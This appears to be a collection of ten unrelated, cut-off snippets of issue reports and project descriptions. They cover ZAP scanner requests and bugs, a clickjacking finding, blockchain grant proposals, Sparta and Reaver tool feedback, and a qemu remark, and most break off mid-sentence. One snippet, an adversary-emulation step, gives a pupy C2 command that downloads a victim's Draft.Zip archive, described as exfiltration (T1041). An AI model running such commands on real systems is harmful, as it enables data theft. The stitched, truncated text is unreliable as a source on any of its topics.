-
Providing a method for disabling the url encoding made by zap when it finds characters like " ' " (simple quote), "@" and things alike will greatly help us test applications, as shown in that "[Cracki…
-
## Clickjacking
Due to the website not sending the`X-Frame-Options: sameorigin` header, it is possible to manipulate users in giving information about their account to an attacker.
Just add `X-Frame…
-
# Forge4Flow
## Grant category
- **Developer tools / services** ✅
## Description
### Problem statement
- **Audience**: Developers immersed in the Flow blockchain landscape.
- **What's …
-
### Describe the bug
When scanning our site with zap automation framework inside docker using the Logmessages.js script I discovered that a third of all requests made were made to https://tracking-…
-
# Description
The file is then exfiltrated over the existing C2 connection (T1041).
`[pupy] > download "C:\Users\pbeesly\AppData\Roaming\Draft.Zip" .`
-
Hello, and first of all a big **thank you** for developing Sparta. I love this tool, think the idea is spot-on and you have a great base here to make the ultimate 'semi-automated" pentesting tool, and…
-
# Web3Task
## Grant category
- [x] Open source maintenance
- [ ] Developer tools / services
- [ ] Educational material
## Description
Web3Task is a platform that solves the problem of mo…
-
I am using an ARM device and using qemu to simulate AMD_64. Loading Desktop will make the operation much slower.
-
Hi guys,
Thank you for your work, this tool could be very great.
I have some suggestions to improve it.
- To not run all tools automatically (ex: nikto, etc.). Propose an option to the user to do…
-
```
Answer the following questions for every issue submitted:
0. What version of Reaver are you using? (Only defects against the latest
version will be considered.)
latest source as of today May 22…